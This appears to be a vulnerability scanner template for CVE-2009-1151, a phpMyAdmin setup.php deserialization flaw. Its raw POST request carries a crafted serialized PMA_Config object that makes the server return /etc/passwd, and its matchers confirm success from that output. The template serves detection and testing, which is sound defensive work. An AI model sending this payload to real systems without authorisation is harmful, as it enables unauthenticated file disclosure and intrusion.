id: CVE-2009-1151

info:
  name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
  author: princechaddha
  severity: high
  description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
  reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
  vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
  tags: cve,cve2009,phpmyadmin,rce,deserialization

requests:
  - raw:
      - |
        POST /scripts/setup.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 80

        action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:[x*]:0:0:"